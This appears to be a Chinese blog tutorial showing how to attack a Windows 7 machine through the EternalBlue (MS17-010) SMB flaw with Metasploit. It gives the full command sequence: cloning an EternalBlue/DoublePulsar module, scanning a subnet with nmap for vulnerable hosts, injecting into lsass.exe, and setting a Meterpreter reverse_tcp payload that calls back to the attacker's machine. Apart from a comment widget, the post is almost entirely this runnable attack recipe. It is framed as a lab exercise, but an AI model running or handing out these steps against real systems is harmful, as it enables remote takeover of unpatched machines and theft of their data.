MSF框架实现“永恒之蓝”ms17-010的exp攻击

其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。

本次用到的环境:

kali系统.ip地址:192.168.1.106

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102

具体的步骤如下:

kali系统下安装wine32:

dpkg --add-architecture i386 && apt-get update &&apt-get install wine32

git clone下载其利用脚本

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

nmap漏洞指定扫描:

nmap -n -p445 --script smb-vuln-ms17-010 192.168.0.0/24 --open

启动msf,然后进行一系列设置:

service postgresql start
msfconsole
search  eternalblue
use  exploit/windows/smb/eternalblue_doublepulsar

进行攻击载荷的配置工作:

set  DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps     
set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set  PROCESSINJECT   lsass.exe
set  TARGETARCHITECTURE  x64
set  rhost  192.168.1.102
show targets
set  target 8
set  payload windows/x64/meterpreter/reverse_tcp
show options
set  lhost 192.168.1.106
exploit

效果如下

QQ截图20180508135850.png
成功.png

以上就是对有”永恒之蓝”漏洞电脑实现的入侵和攻击~

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇
隐藏
变装